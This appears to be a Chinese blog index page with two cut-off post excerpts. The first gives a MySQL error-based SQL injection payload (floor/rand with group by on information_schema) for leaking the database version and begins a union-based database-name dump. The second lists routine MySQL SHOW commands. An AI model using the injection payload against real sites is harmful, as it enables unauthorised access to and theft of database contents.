摘要:
1、通过floor报错,注入语句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a); 爆数据库名:'union se 阅读全文
摘要:
MySQL 显示表字段及注释等信息 SHOW DATABASES //列出 MySQL Server 数据库。 SHOW TABLES [FROM db_name] //列出数据库数据表。 SHOW TABLE STATUS [FROM db_name] //列出数据表及表状态信息。 SHOW CO 阅读全文